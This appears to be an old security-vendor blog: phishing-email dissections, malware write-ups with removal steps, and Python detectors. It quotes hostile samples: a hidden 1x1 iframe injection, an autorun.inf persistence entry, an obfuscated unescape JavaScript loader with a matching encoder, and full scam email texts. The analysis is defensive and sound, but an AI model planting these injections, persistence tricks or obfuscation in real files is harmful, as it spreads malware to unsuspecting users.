Saturday, March 14, 2009

How to redirect a 404 error page

Usually when you type a wrong address for a website you get a so-called 404 page. Actually 404 is the error code returned by the web server when a requested page was not found. Now, if you are a web developer or the administrator of a domain, you may want to redirect users to the main page (let's say index.html).
All you have to do is add this rule to your .htaccess file:

ErrorDocument 404 /index.html

Enjoy :)

Friday, March 13, 2009

Money from Canadian Revenue Agency

I think I'm lucky this year. I just received an e-mail from the Canada Revenue Agency telling me that I'm eligible for a tax refund of 386.00.
Cool!!! ... but hey, I don't live in Canada, so what is going on?
The e-mail looks ok, as you can see below:

Canada Revenue Agency
Online Refund Form

After the last annual calculation of your fiscal activity we have determined that you are eligible to receive a tax refund of 386.00.

Please submit the tax refund and allow us 3-9 days in order to process it.

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.

To access the form for your tax refund, please click here

Copyright Canada Revenue Agency. All rights reserved. www.cra-arc.gc.ca

As you can see in the screenshot, the website looks like the real one, www.cra-arc.gc.ca.

Now, the fake website for the online refund form is in Taiwan and last time I looked, Taiwan wasn't a part of Canada.

If we start analyzing it we can see that this is just another case of identity theft. The form asks for the following elements:
Social Insurance Number, DOB (date of birth) and full name.

So, unfortunately it's just spam; it was too good to be true. Maybe next time...

Happy greetings e-card is waiting for you

The anatomy of a greeting:

I just opened my mail in the morning and saw an interesting message in the junk folder.
It appears that someone sent me an e-card; too bad it's not my birthday.
The mail looks like this:

Carol has sent an e-card.
Your Greeting card will be available at:
hxxp://greetingcardcalendar.com/ID=?-XXXXX..X-
This card was sent from 123greetings.com!

At first glance this may look valid to anyone. 123greetings.com is a legitimate website with some lovely e-cards.
Now the question that arises is: why isn't the link from 123greetings.com?
So, we downloaded the webpage and had such a "BIG" surprise: it has a link to a "card.exe". Now that's funny.
How many clean exe e-cards from 123greetings have you seen? The correct answer is NONE.

Fortunately, the "card.exe" (MD5: 88dfdfa6ba077c18df753f279a51258d) is already detected by us and by several antivirus scanners:
Email-Worm.Win32.Iksmas.by (Kaspersky), W32/Waledac.gen.a (McAfee), Trojan:Win32/Waledac.B (Microsoft)


So, what we can learn from this e-mail is that even if a message appears to come from a legitimate website, always check the link to see where it really points.
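To turn that advice into something you can run over a mailbox export, here is a small Python checker (an added example, not code from this post). It pulls every link out of the message body, compares the link's domain with the service the mail claims to come from ("sent from ..."), and also flags links that hand out an executable directly; the sample message is a constructed copy of the e-card mail above, and the "sent from" phrase and the crude two-label domain comparison are my own assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed sample of the e-card message quoted in the post (not the real
# e-mail). The "hxxp" defang and the placeholder ID are kept as on the page.
SAMPLE_MAIL = """Carol has sent an e-card.
Your Greeting card will be available at:
hxxp://greetingcardcalendar.com/ID=?-XXXXX..X-
This card was sent from 123greetings.com!
"""

# Links, including defanged ones; "sent from <domain>" is the claimed origin.
URL_RE = re.compile(r"\b(?:hxxps?|https?)://[^\s<>'\"]+", re.IGNORECASE)
CLAIM_RE = re.compile(r"\bsent from\s+([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")


def registered_domain(host):
    """Crude eTLD+1: the last two labels. Good enough for .com/.biz style
    names; a real tool would consult the public suffix list."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def extract_links(text):
    """Return the links in the body, with hxxp defanging undone for parsing."""
    return [m.group(0).replace("hxxp", "http", 1) for m in URL_RE.finditer(text)]


def claimed_domains(text):
    """Domains the message itself says it was sent from."""
    return [registered_domain(m.group(1)) for m in CLAIM_RE.finditer(text)]


def check_ecard_mail(text):
    """Flag links whose domain does not match the service the mail claims to
    come from, and links whose path ends in an executable extension.
    Each finding is (kind, link, link_domain, claimed_domains)."""
    findings = []
    claims = set(claimed_domains(text))
    for link in extract_links(text):
        parts = urlsplit(link)
        dom = registered_domain(parts.hostname or "")
        if claims and dom not in claims:
            findings.append(("domain-mismatch", link, dom, sorted(claims)))
        if parts.path.lower().endswith(EXEC_EXT):
            findings.append(("executable-link", link, dom, []))
    return findings


if __name__ == "__main__":
    for kind, link, dom, claims in check_ecard_mail(SAMPLE_MAIL):
        print(kind, link, "link domain:", dom, "claimed:", claims)
```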

Enjoy :)

MD5 database for Vista

Here you can find a database with MD5 sums for files that can be found in the %systemdir% in Vista.

How to create a native application in C

First, read this article. So, you will only need a Windows DDK (Driver Development Kit).
After that, you need to create 2 files in your working directory:
makefile
!INCLUDE $(NTMAKEENV)\makefile.def

and
sources
TARGETNAME=myprog
TARGETPATH=OBJ
TARGETTYPE=PROGRAM
SOURCES=myprog.c

Now create your myprog.c file and don't forget to use only Native APIs. When you're done, run the checked/free Windows DDK command prompt, go to your working folder and type the following command:

build

If everything was ok, you should have a new folder (like objchk_wxp_x86, objfree_wxp_x86, etc.) with an exe in it. Btw, don't forget that you can't run it like a normal Windows app!

Enjoy :)

Trojan.Iframe

- What it is, what it does


[Description]

You can find it almost anywhere, it is small and can hardly be seen :)
You can encounter it even on websites that are supposed to be clean, because malicious people use all kinds of exploits for known platforms in order to append a small piece of code to a certain web page.
In order to understand it better, let me show you how it appears:

<iframe src='http://IP/path/index.php' width='1' height='1' style='visibility: hidden'></iframe>

(other variants are the same: different attributes, sources, etc., but they have the same behaviour)

As you can see, it isn't something extraordinary, just one line of code... but let's see what it does.

First it will create an invisible frame that points to a certain website. Usually that website is a fake one, or a real one that was hacked.
Now, the content received from that IP is malicious. It can be an exploit, for example a specially crafted image that, when rendered, triggers a buffer overflow so that arbitrary code is executed. This has the potential to take over the entire machine and add it to a very large botnet.
A botnet is a network of zombie computers whose purpose is to serve a malicious person. They can send spam, attack other computers causing a Denial of Service, etc.
Also, it can add a keylogger in order to gather passwords, credit card numbers and other confidential information.
Their primary purpose is to make money, so they will continue to do this and a lot more in order to ensure that.

Now, as you can see, with just one line of code someone can gain access to your entire system. It could even be monitoring your activity right now...
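An added example (not from the original post) of how a site owner can spot this kind of injection when checking their own pages: a Python scanner built on the standard-library HTMLParser that flags iframes sized 1x1 or hidden through CSS, run over a constructed page containing the iframe shown above (the host "IP" is the page's placeholder, not a real address).

```python
from html.parser import HTMLParser

# Constructed sample page: one ordinary iframe, the 1x1 hidden iframe from
# the post, and one hidden with display:none. "IP" is a placeholder host.
SAMPLE_HTML = """<html><body>
<h1>Some clean page</h1>
<iframe src="https://example.org/widget" width="300" height="200"></iframe>
<iframe src='http://IP/path/index.php' width='1' height='1' style='visibility: hidden'></iframe>
<div><iframe src="http://IP/other/x.php" style="display:none"></iframe></div>
</body></html>"""


def _tiny(value):
    """True when a width/height attribute is 0 or 1 pixels ('1', '1px', '0')."""
    if value is None:
        return False
    v = value.strip().lower().rstrip("px").strip()
    return v.isdigit() and int(v) <= 1


def _hidden_style(style):
    """True when the inline style hides the element."""
    s = (style or "").replace(" ", "").lower()
    return "visibility:hidden" in s or "display:none" in s


class IframeFinder(HTMLParser):
    """Collects every iframe and records why it looks like a hidden injection."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = dict(attrs)
        reasons = []
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("1x1-size")
        if _hidden_style(a.get("style")):
            reasons.append("hidden-style")
        if reasons:
            # getpos() gives the line of the tag being handled
            self.findings.append({"src": a.get("src"),
                                  "line": self.getpos()[0],
                                  "reasons": reasons})


def find_hidden_iframes(html):
    """Return a list of {src, line, reasons} for suspicious iframes in html."""
    p = IframeFinder()
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_HTML):
        print("line %d: %s (%s)" % (f["line"], f["src"], ", ".join(f["reasons"])))
```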


[Clean]

What can you do in order to prevent this? Hmm... not much. If you are a regular user who doesn't want to do complicated things, then just have an antivirus installed and keep your computer updated.

If you are a person who cares very much about security then you can add a few more layers of protection; for example you can use a virtual machine (VMware, Virtual PC, etc.) to browse the internet.

But usually if you have a good antivirus installed and updated, then you can say that you are protected, but don't browse malicious websites :)

Still, if the antivirus warns you about it, then usually all you have to do is delete the infected file (this can be achieved by deleting the temporary internet files, or the cache, depending on your browser).

Trojan.VB.28672

(aka Win-Trojan/Landa.28672, Trojan.VB.AE, Worm/VB.JZ, W32/Backdoor.IBK, Trj/Riwomuz.A, Trojan.Fasiat )


[Description]

The trojan aims to appear as a valid picture, movie or application.
This is also its spreading method: it searches for media files or applications and copies itself next to them with a similar name.
When it is run, it will show a message box with one of several fake errors (see the screenshots):

After that it starts to search all folders for media files (avi, jpg and mp3 extensions).
If it finds a media file, it copies itself into the same folder, borrowing the same name
but adding the .exe extension (e.g. picture1.jpg.exe).
It also searches for application files (exe extension).
If it finds an exe file, it copies itself into the same folder but adds a random letter
in front of the name.
It also checks the size of every file and, if it is 28,672 bytes, it will not infect it. It does that
in order to avoid creating a copy of a file that is already infected.
You can easily check if the virus is active by opening Task Manager and looking for an "L_and_A"
application like in the following picture:
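As an added example (not the removal tool from this post), here is a Python hunt script that walks a folder tree and applies the three rules described above: a media name with .exe appended, an exe whose name is another exe in the same folder with one extra leading letter, and the 28,672 byte marker size. The directory it scans is constructed by the script itself; the marker size alone is a weak signal, so the other two rules carry the decision.

```python
import os
import shutil
import tempfile

INFECTED_SIZE = 28672          # size the trojan treats as "already infected"
MEDIA_EXT = (".avi", ".jpg", ".mp3")


def classify(filename, size, exe_siblings):
    """Return the reasons a file looks like a Trojan.VB.28672 copy (or [])."""
    name = filename.lower()
    if not name.endswith(".exe"):
        return []
    reasons = []
    stem = name[:-4]
    if stem.endswith(MEDIA_EXT):               # picture1.jpg.exe
        reasons.append("media-name-plus-exe")
    # xsetup.exe next to setup.exe: one random letter added in front
    if len(name) > 5 and name[1:] in exe_siblings:
        reasons.append("random-letter-prefix")
    if size == INFECTED_SIZE:                  # weak on its own
        reasons.append("marker-size-28672")
    return reasons


def hunt(root):
    """Walk root and return {path relative to root: reasons} for suspicious files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        exe_names = {f.lower() for f in files if f.lower().endswith(".exe")}
        for f in files:
            p = os.path.join(dirpath, f)
            try:
                size = os.path.getsize(p)
            except OSError:
                continue
            reasons = classify(f, size, exe_names)
            if reasons:
                hits[os.path.relpath(p, root)] = reasons
    return hits


def build_sample_tree():
    """Constructed sample: a benign picture, a fake 'picture1.jpg.exe' of marker
    size, a legitimate setup.exe and a prefixed copy beside it. Returns the root."""
    root = tempfile.mkdtemp(prefix="vb28672_")

    def write(name, size):
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(b"\0" * size)

    write("picture1.jpg", 1000)
    write("picture1.jpg.exe", INFECTED_SIZE)
    write("setup.exe", 4096)
    write("xsetup.exe", INFECTED_SIZE)
    return root


def remove_sample_tree(root):
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    root = build_sample_tree()
    for path, reasons in hunt(root).items():
        print(path, "->", ", ".join(reasons))
    remove_sample_tree(root)
```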

[Clean]

Download our removal tool (Trojan.VB.28672-removaltool.zip) and restart the system in safe mode.
Extract the contents of the zip file to a folder. After that go to the folder where you have extracted
the contents of the archive and double click on the removaltool application. An easy to use graphical
interface will appear. Check the "Scan and clean" option and press the "Scan" button.

VB Alcan Worm

(aka Win32/Alcan.J, Win32.Worm.VB.Ymeak.A, Trojan.Dropper.Win32.VB.Lu )


[Description]

This worm is designed to spread by using various P2P file sharing applications.
When it is executed it will create a copy in the startup folder for all users
with the name svchost.exe.
After that it will show a message in order to fool the user into thinking the file can't be run:
The setup file is corrupted

After you click on OK, it will launch the svchost copy and the original program
will end its execution.
The new svchost process will begin to search the Windows folder for various files
that are usually backdoors:
winlog.exe, p2pnetworking.exe, scvhost.exe, winlogi.exe and p2pnetwork.exe

If it can't find any of those files, it will drop a new UPX packed backdoor in the Windows folder
called b.exe.
After that it will try to spread by searching for the following P2P file sharing programs:
BearShare, Limewire, Morpheus, Shareaza

If it finds any of those it will create a subfolder in the shared folder with the name _ (underscore).
In that folder it will create a copy in order to fool other users into downloading it and infecting
their machines.

In order to avoid detection and to protect itself from deletion, it will open the following
programs for exclusive access: cmd.exe, ipconfig.exe, netstat.exe, ping.exe, tracert.exe,
regedit.exe, regedt32.exe, taskkill.exe and taskmgr.exe

By doing this it will stop you from launching a registry editor or task manager, for example.
When you try to open one of those programs it will show a message telling you that the program is
in use.


[Clean]

It is best to restart the system in safe mode in order to prevent non-critical processes from running at startup.
Delete the svchost.exe file from the startup folder
(usually this is: C:\Documents and Settings\All Users\Start Menu\Programs\Startup)

Delete the b.exe file that is located in the Windows folder.

Trojan.VB.AQT

(aka TR/VB.aqt )


[Description]

This trojan is designed to spread by creating copies of itself on removable drives.
When it is run, it checks if there is a folder called Recycled in the root of the drive.
If the folder doesn't exist it will create it.
It will create a file called info2 and one called desktop.ini in the Recycled folder.
The desktop.ini file has the following contents:
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}

It will create a subfolder with the name Recycled where it will put a copy of itself
with the name ctfmon.exe.
It creates the file autorun.inf in the root of the drive with the following contents:
[autorun]
shellexecute=Recycled\Recycled\ctfmon.exe
shell\Open(&O)\command=Recycled\Recycled\ctfmon.exe
shell=Open(&0)

It reads the value of the registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Startup
which represents the path of the Startup folder of the current user,
and copies the ctfmon.exe file there.
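An added Python example (not from the original post) that inspects the two files the trojan writes, constructed here with the contents listed above: it reports which [autorun] entries launch a program, and whether a desktop.ini carries the Recycle Bin CLSID that makes Explorer treat the Recycled folder as a shell object rather than an ordinary directory. The minimal INI parser is my own, written so that key case and backslashes survive intact.

```python
import re

# Constructed copies of the two files described above (contents as on the page).
SAMPLE_AUTORUN = """[autorun]
shellexecute=Recycled\\Recycled\\ctfmon.exe
shell\\Open(&O)\\command=Recycled\\Recycled\\ctfmon.exe
shell=Open(&0)
"""
SAMPLE_DESKTOP_INI = """[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
"""
# CLSID of the real Recycle Bin shell object (the value quoted on the page).
RECYCLE_BIN_CLSID = "{645ff040-5081-101b-9f08-00aa002f954e}"
EXEC_RE = re.compile(r"\.(exe|com|bat|cmd|scr|pif|vbs|js)\b", re.IGNORECASE)


def parse_inf(text):
    """Minimal INI parser: {section (lowercased): {key: value}}; keys keep
    their case and backslashes, unlike configparser's default optionxform."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            k, v = line.split("=", 1)
            sections[current][k.strip()] = v.strip()
    return sections


def inspect_autorun(text):
    """Return the (key, value) pairs under [autorun] that launch a program:
    open=, shellexecute= and any shell\\<verb>\\command= entry whose value
    names an executable. icon=/label= entries are not launchers."""
    auto = parse_inf(text).get("autorun", {})
    launchers = []
    for k, v in auto.items():
        kl = k.lower()
        if (kl in ("open", "shellexecute") or kl.endswith("\\command")) and EXEC_RE.search(v):
            launchers.append((k, v))
    return launchers


def masquerades_as_recycle_bin(desktop_ini_text):
    """True when a desktop.ini assigns the folder the Recycle Bin's CLSID."""
    info = parse_inf(desktop_ini_text).get(".shellclassinfo", {})
    clsid = info.get("CLSID", info.get("clsid", ""))
    return clsid.lower() == RECYCLE_BIN_CLSID


if __name__ == "__main__":
    for key, value in inspect_autorun(SAMPLE_AUTORUN):
        print("autorun launcher:", key, "=", value)
    print("desktop.ini poses as Recycle Bin:", masquerades_as_recycle_bin(SAMPLE_DESKTOP_INI))
```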

[Clean]

Open Task Manager and terminate the ctfmon.exe process.
Delete the ctfmon.exe file from the Startup folder.
Delete the following files
(this should also be done for infected removable drives):
autorun.inf, Recycled\desktop.ini, Recycled\info2, Recycled\Recycled\ctfmon.exe

Adware Spywad

( aka Adware/Spywad, Adware.Spywad, SpySheriff, Trojan.Renos, W32/Renos )


[Description]

When it is run it will copy itself to the C:\Windows directory under the name xpupdate.exe.
It will add a key in:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows update loader so it can run at startup.

It will check if the file MalwareAlarm exists in the C:\Program Files\MalwareAlarm directory.
It will create a thread that searches for dialog windows so it can answer Windows Firewall
queries automatically in order to get access to the internet.
It will download the MalwareAlarm program.
It will create the MalwareAlarm.lic file.
It will change the background and remove icons, shortcuts and other items from the desktop.
It will disable the options to modify the wallpaper, so the user interface will look like the one of Windows NT 4.0.
It will show messages that the system is infected with spyware/adware.
It will create/modify the following registry keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows update loader
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoAddingComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoEditingComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoDeletingComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoHTMLWallPaper

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceActiveDesktopOn

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\Wallpaper

HKCU\Software\Microsoft\Internet Explorer\Desktop\General\WallpaperStyle
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\TileWallpaper
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\WallpaperFileTime
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\WallpaperLocalFileTime
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\ComponentsPositioned


[Clean]

Open Task Manager and end/terminate the xpupdate.exe process
Delete the C:\Windows\xpupdate.exe file
Delete the registry keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows update loader
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceActiveDesktopOn

Trojan Winfixer

(aka Application/ErrorSafe, Trojan.Downloader.Winfixer.O, Win32/Winfixer )


[Description]

This is a program designed to trick the user into believing that the computer has errors and that in order to fix them he/she needs to buy it.
When it is first launched it shows a message to inform you that it will download and install a program called ErrorSafe.
After the download is finished, the program is automatically installed and a system scan is made.
When the scan is finished a fake report will be shown with the result that the system has many critical errors.
If you click on the Repair button, you will be redirected to a website in order to purchase the full version of the program.

The errors that are presented in the report do not exist and are shown only to convince you that you need to buy the program.

After the program is installed, it will automatically set itself to run on every startup, by creating the following registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
UERScw - C:\Program Files\ErrorSafe Free\UERScw.exe
was_check - C:\Program Files\ErrorSafe Free\PASmon.exe


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ErrorSafeFree - C:\Program Files\ErrorSafe Free\uers.exe


Also it will add the following CLSIDs in the registry:
{25F43076-32B8-4828-A88C-8288EEE53396}
{3EB15ED2-15A6-4E1A-B84A-ACFAE64583E1}
{53D5C0AF-1B61-44A1-8739-31ABD4117D8D}
{6EF91405-4FCB-4633-BAB3-FA5B3DC40C3B}
{703BDF83-2C12-4d20-8BB0-106DDAB01B59}
{7300F6AF-78E6-4167-845A-6089879F1DB0}
{C5531D07-22C2-418B-85B9-D829AF1498B0}
{E0767047-9D25-4a3a-B905-852CDA087E86}
{E7296F98-6668-419c-AE1D-04ED641E7C3E}
{F585CB1F-F17D-4007-A573-B663197EF500}


[Clean]

In order to remove the program you can go to Control Panel->Add/Remove Programs.
Then select ErrorSafe and click on the Remove button.

After that it is best if you open regedit and run a search for the CLSIDs that were listed in the
description of this trojan. If you find any of those keys you can delete them.

It is recommended that before you do any modification, you back up your registry or your system.

Fake job offer from Aegis Capital Group LLC - phishing scam!

[Description]

These days have started with another phishing scam. It is about a fake job offer that appears to be from Aegis Capital Group.
In the fake mail, a position of "Account manager" is offered (possibly other positions too).

The e-mail is similar to this one:

Subject: the reply for your request for a job place


Dear sirs,

Aegis Capital Group LLC ("Aegis") is a specialty investment firm managing private
equity and venture capital funds with a national focus on small businesses and the
social benefits of supporting entrepreneurs and enhancing local job creation. We
would like to stress, that our company pays special attention to customer support of
private customers, though we also have the corresponding business plans for the
bigger companies as well. A more detailed information about our company you may
obtain at our official website.
Due to the necessity for expansion of our company, we have announced some additional
openings for new employees. We are glad to offer you one of the vacant positions in
our company's team - a position of the "Account manager".
You will have the responsibility for the following duties: fulfillment of orders
given by the company, operations with the bank transfers(direct deposits and wires)
from customers, implementation of calculations regarding customer payments,
acceleration of the space needed for the delivery of payments to the regional
branches by provision of money transactions (customers' payments) via worldwide
Western Union instant transfer system, processing of correspondence by means of
mail forwarding and scanning.
The position offered is regarded to be a part-time job, so you will only need to
have about 1 free hour a day to be able to work with us. You will earn a net 10%
commission for every transaction you dealt with. All the traveling expenses and
transfer fee charges are covered by the customer.
You do not need any previous experience in finance sphere, because we will provide
you with the most detailed instructions, support and advice at each stage of the
responsibilities' implementation.
You may hope for the career growth within our company. Under certain circumstances
you will have a chance of providing your services to major companies and VIP
customers. In such a case, both your salary and your status in our company will
sustain an increase.
You may find more detailed info at our website by following hyperlink:

http://joboffer-705236799.acapsite.hk/?vacancy

Sincerely Yours,
HR Manager

------------------------------------------------------------------------------------------------

By following the link given in the offer we are presented with a "job vacancy" page.

If we choose to fill in the online form then we are presented with a "contract page"
where we must complete some fields; among other personal data there is one called
SSN (Social Security Number). More information on SSN can be found here.

Also, besides the SSN, there are fields that request the bank account number, type of account, account name, etc.

It is just one case among many others where the name of a known company is used in an identity theft scam.


Our advice is to ignore this type of e-mail and delete it from your INBOX.

Spylocked adware

(aka Adware.Spylocked, Adware.SpywareLock.A, Adware/Spylocked )

[Description]

This is an adware program that is designed to show fake messages in order to trick the user into downloading certain programs.

When it is executed the malware will create the following registry keys:

HKCR\CLSID\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Windows Safety Alert, DisplayName
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Windows Safety Alert, UninstallString
HKLM\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad, bedstead

In order to run at startup, the Spylocked adware uses two registry keys:
SharedTaskScheduler and ShellServiceObjectDelayLoad, both of which make Explorer.exe load the dll automatically
when the computer starts.

It drops a file named rcohty.dll to %WINDIR%\System32 folder.

When the dll is loaded by rundll32 it will do the following:
It verifies the existence of the key:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpywareLocked 3.5

If it is present then it will get the value of DisplayIcon and execute it.

If it's not present, the dll will show a flashing icon in the system tray and a fake warning message:
"System has detected a number of active spyware applications that may impact the performance of your computer.
Click the icon to get rid of unwanted spyware by downloading an up to date antispyware solution."

If the user clicks on the icon then a new Internet Explorer window appears and a connection is made to:
http://www.spylocked.com


[Clean]

1. Terminate the rundll32.exe process
2. Delete the %WINDIR%\System32\rcohty.dll file
3. Open regedit and delete the following keys

HKEY_CLASSES_ROOT\CLSID\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Windows Safety Alert
HKLM\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad, bedstead

Unescape Script Trojans

( a short analysis of Trojan.Agent.AKT )


[Description]

This is a JavaScript trojan. Basically it just opens a connection to a webpage for adults.
Below I will present some technical details that are usually encountered in most JavaScript trojans.

The code of this trojan looks something like this (only a part is shown):
<script language="javascript">
document.write(unescape('%3C%73%63%72%69...'));dF('%264Dtdsjqu%2631...')</script>

N.B.:
This code is usually added to adult web-sites and is set to be triggered by a certain action.

The unescape function replaces every character encoded in the %xx hexadecimal form with its ASCII character.
So, when that script is executed, the real code will be like this:

<script language="javascript">
function dF(s)
{
var s1= unescape(s.substr(0,s.length-1));
....
}

After that there is a call to this function. The parameter is actually code that opens a specific window.
So, the dF function decrypts %264Dtdsjqu%2631... to

http://egno{blocked}.com/questbook/in.cgi?...&HTTP_REFERER=file...NAME_OF_THE_FILE.html...
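To show what the unescape and dF steps above actually compute, here is an added Python re-implementation (not the trojan's code, and not part of the original post). It reproduces JavaScript's escape/unescape, decodes a dF argument the way that routine does (unescape all but the last character, subtract the last digit from every character code, unescape again; the subtraction step is my assumption, since the page elides the body of dF), and includes the matching encoder. The constructed test vector extends the page's fragment %264Dtdsjqu%2631 with an assumed shift digit of 1, which decodes to "<script ".

```python
import re

# Constructed test vector: the page's fragment '%264Dtdsjqu%2631' plus a
# trailing '1', the shift digit dF reads from the end of its argument.
SAMPLE_ARG = "%264Dtdsjqu%26311"

_UNESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
# Characters JavaScript's escape() leaves untouched.
_SAFE = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@*_+-./")


def js_unescape(s):
    """Behaves like JavaScript's unescape(): %XX and %uXXXX back to characters."""
    return _UNESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def js_escape(s):
    """Behaves like JavaScript's escape(): everything outside A-Z a-z 0-9 @*_+-./
    becomes %XX, or %uXXXX for code points above U+00FF."""
    out = []
    for ch in s:
        cp = ord(ch)
        if ch in _SAFE:
            out.append(ch)
        elif cp < 256:
            out.append("%%%02X" % cp)
        else:
            out.append("%%u%04X" % cp)
    return "".join(out)


def df_decode(arg):
    """Reproduce dF(s) and return the HTML it would document.write():
    unescape all but the last char, shift every char code down by that
    last digit, then unescape the result once more (assumed shift step)."""
    shift = int(arg[-1])
    s1 = js_unescape(arg[:-1])
    t = "".join(chr(ord(c) - shift) for c in s1)
    return js_unescape(t)


def df_encode(html, shift):
    """The matching encoder, so the decoder can be checked against known input:
    escape, shift every char code up, escape again, append the shift digit."""
    shifted = "".join(chr(ord(c) + shift) for c in js_escape(html))
    return js_escape(shifted) + str(shift)


if __name__ == "__main__":
    print(repr(df_decode(SAMPLE_ARG)))        # '<script '
    print(df_encode("<script ", 1))           # %264Dtdsjqu%26311
```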


[Clean]

In order to clean the computer, you just need to delete the html file that has this script in it.

Neospace Trojan

(aka Trojan.Horse3.ABC )


[Description]

It creates a mutex named [Windows_Alert] in order to check whether the system is already infected.
It shows a message box with a fake warning:

"Windows has detected spyware programs running on your computer.
It is strongly recommended to use special software tools to prevent data loss.
Windows will now download the newest antispyware for you.
Click OK to protect your computer from spyware"


Then it tries to open a connection to http://www.neospa{blocked}celab.com
After 2 minutes (120 sec), it will copy itself into the Windows system folder under the name wincrt.exe.
Also it will add the following registry key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run, Windows Critical Alert
having the value %WINDIR%\System32\wincrt.exe
(%Windir% is usually C:\Windows)

[Clean]

In order to clean the computer, please restart it in Safe Mode and do the following:

- Locate and delete the file:
%Windir%\System32\wincrt.exe

- Go to Start, Run, type regedit and press OK.
- Navigate to:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

- Delete the key:
Windows Critical Alert with the value %WINDIR%\System32\wincrt.exe

Tibs.C Trojan

(aka Trojan.Downloader.Tibs.C, Trojan-Downloader.Win32.Tibs.gc TR/Dldr.Tibs.C )


[Description]

This trojan copies itself into the system directory with the name kernels88.exe.

It bypasses the built-in Windows Firewall in order to allow the malware to connect to the internet,
download some files into the Windows system folder and execute them.

The names of some of the files start with: dlh9jkd1q%number%.exe
Other files have the name %number%.dllb
Also there is a file called: vx.tll
All of them can be found in the Windows System folder (e.g. C:\Windows\System32\vx.tll).

It steals some information about the computer where the malware is present.
This information includes: version of the operating system, build, platform, processor type, etc.

Also it sets registry keys in SOFTWARE\Microsoft\Windows\CurrentVersion\Run and SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices in order to run at startup.

It tries to create a semaphore called outpost.exe and at the end it will disable the Task Manager.

[Clean]

In order to clean the computer, please restart it in Safe Mode and delete the following files:
C:\windows\system32\kernels88.exe
C:\Windows\System32\dlh9jkd1q1.exe
C:\Windows\System32\dlh9jkd1q2.exe
C:\Windows\System32\dlh9jkd1q5.exe
C:\Windows\System32\dlh9jkd1q6.exe
C:\Windows\System32\dlh9jkd1q7.exe
C:\Windows\System32\dlh9jkd1q8.exe
C:\Windows\System32\1.dllb
C:\Windows\System32\2.dllb
C:\Windows\System32\3.dllb
C:\Windows\System32\4.dllb
C:\Windows\System32\5.dllb
C:\Windows\System32\6.dllb
C:\Windows\System32\7.dllb
C:\Windows\System32\vx.tll



Delete the registry keys:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run - System
